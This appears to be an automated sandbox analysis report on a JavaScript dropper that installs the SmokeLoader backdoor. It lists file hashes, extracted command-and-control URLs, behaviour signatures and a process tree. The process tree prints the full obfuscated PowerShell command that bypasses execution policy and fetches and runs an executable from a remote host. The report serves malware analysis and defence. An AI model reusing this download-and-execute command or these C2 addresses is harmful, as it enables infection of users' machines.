Analysis
-
max time kernel
150s -
max time network
137s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
21-01-2021 17:55
Static task
static1
Behavioral task
behavioral1
Sample
file.js
Resource
win7v20201028
Behavioral task
behavioral2
Sample
file.js
Resource
win10v20201028
General
-
Target
file.js
-
Size
27KB
-
MD5
c25cf17b8ec2aab1ae5222db7fa83368
-
SHA1
2e78dc32dbac62df2ed6223813ea91b9b2de0ff4
-
SHA256
24c7a1cec052e9f92013628100f19dd8b3f564c3bdaa2f8339a74e37146684c6
-
SHA512
44cc5dd4b69faedc7e7c265dc70fa014622754f09758a0ae519aeb5c3d4f1a4be9cf2e43ee3903d77430328ea7af04d1bce5b0329c115e01afe01010d4df1148
Malware Config
Extracted
http://citycapproperty.ru/localmod/nmode.exe
Extracted
smokeloader
2020
http://smbproperty.ru/
http://gmbshop.ru/
http://baksproperty.gov.ug/
http://magistralpsw.ru/
http://mpmanagertzz.ru/
http://powerglasspot.ru/
http://autopartswarehouses.ru/
http://memoloves.ru/
http://alfavanilin.ru/
Signatures
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 9 2944 powershell.exe -
Executes dropped EXE 1 IoCs
Processes:
TempwlS16.exepid process 3268 TempwlS16.exe -
Loads dropped DLL 1 IoCs
Processes:
TempwlS16.exepid process 3268 TempwlS16.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
TempwlS16.exedescription ioc process Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI TempwlS16.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI TempwlS16.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI TempwlS16.exe -
Suspicious behavior: EnumeratesProcesses 2521 IoCs
Processes:
powershell.exeTempwlS16.exepid process 2944 powershell.exe 2944 powershell.exe 2944 powershell.exe 3268 TempwlS16.exe 3268 TempwlS16.exe 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 -
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
TempwlS16.exepid process 3268 TempwlS16.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 2944 powershell.exe Token: SeShutdownPrivilege 3028 Token: SeCreatePagefilePrivilege 3028 -
Suspicious use of UnmapMainImage 1 IoCs
Processes:
pid process 3028 -
Suspicious use of WriteProcessMemory 7 IoCs
Processes:
wscript.execmd.exedescription pid process target process PID 644 wrote to memory of 1880 644 wscript.exe cmd.exe PID 644 wrote to memory of 1880 644 wscript.exe cmd.exe PID 1880 wrote to memory of 2944 1880 cmd.exe powershell.exe PID 1880 wrote to memory of 2944 1880 cmd.exe powershell.exe PID 1880 wrote to memory of 3268 1880 cmd.exe TempwlS16.exe PID 1880 wrote to memory of 3268 1880 cmd.exe TempwlS16.exe PID 1880 wrote to memory of 3268 1880 cmd.exe TempwlS16.exe
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\file.js1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c pOwEr^shEll -ex^ecution^pol^icy b^ypa^ss -n^oprof^ile -w h^idd^en $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://citycapproperty.ru/localmod/nmode.exe','%temp%wlS16.exe'); & %temp%wlS16.exe & mtOiVwFENbWSfhv2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepOwErshEll -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://citycapproperty.ru/localmod/nmode.exe','C:\Users\Admin\AppData\Local\TempwlS16.exe');3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\TempwlS16.exeC:\Users\Admin\AppData\Local\TempwlS16.exe3⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\TempwlS16.exeMD5
057887b52388981063d44ae2ffff29a7
SHA1123ba07b28b49215d4d7b83fbf38cb2a9e0c8b56
SHA256c65ea9eee506b0a71170d4e3778d3ccadda12f67217e89e3b93db61890ab548d
SHA5123440dccd9e39a49b7f37943ccef70eff5bd1fe89c812b82b64df13ab9634f91b585a7d8ae723a94abd9a2c1938378c46a6beb581c1c6337ccefdd8b2c4c0ee5b
-
C:\Users\Admin\AppData\Local\TempwlS16.exeMD5
057887b52388981063d44ae2ffff29a7
SHA1123ba07b28b49215d4d7b83fbf38cb2a9e0c8b56
SHA256c65ea9eee506b0a71170d4e3778d3ccadda12f67217e89e3b93db61890ab548d
SHA5123440dccd9e39a49b7f37943ccef70eff5bd1fe89c812b82b64df13ab9634f91b585a7d8ae723a94abd9a2c1938378c46a6beb581c1c6337ccefdd8b2c4c0ee5b
-
\Users\Admin\AppData\Local\Temp\9419.tmpMD5
50741b3f2d7debf5d2bed63d88404029
SHA156210388a627b926162b36967045be06ffb1aad3
SHA256f2f8732ae464738372ff274b7e481366cecdd2337210d4a3cbcd089c958a730c
SHA512fac6bfe35b1ee08b3d42d330516a260d9cdb4a90bbb0491411a583029b92a59d20af3552372ea8fb3f59442b3945bf524ef284127f397ae7179467080be8e9b3
-
memory/1880-2-0x0000000000000000-mapping.dmp
-
memory/2944-6-0x000001F13E0A0000-0x000001F13E0A1000-memory.dmpFilesize
4KB
-
memory/2944-7-0x000001F1216C0000-0x000001F1216C2000-memory.dmpFilesize
8KB
-
memory/2944-8-0x000001F1216C3000-0x000001F1216C5000-memory.dmpFilesize
8KB
-
memory/2944-9-0x000001F1216C6000-0x000001F1216C8000-memory.dmpFilesize
8KB
-
memory/2944-5-0x000001F1231C0000-0x000001F1231C1000-memory.dmpFilesize
4KB
-
memory/2944-4-0x00007FFC34C00000-0x00007FFC355EC000-memory.dmpFilesize
9.9MB
-
memory/2944-3-0x0000000000000000-mapping.dmp
-
memory/3028-17-0x0000000000870000-0x0000000000886000-memory.dmpFilesize
88KB
-
memory/3268-10-0x0000000000000000-mapping.dmp
-
memory/3268-13-0x0000000003270000-0x0000000003271000-memory.dmpFilesize
4KB
-
memory/3268-16-0x0000000000400000-0x000000000040A000-memory.dmpFilesize
40KB
-
memory/3268-15-0x0000000000030000-0x000000000003A000-memory.dmpFilesize
40KB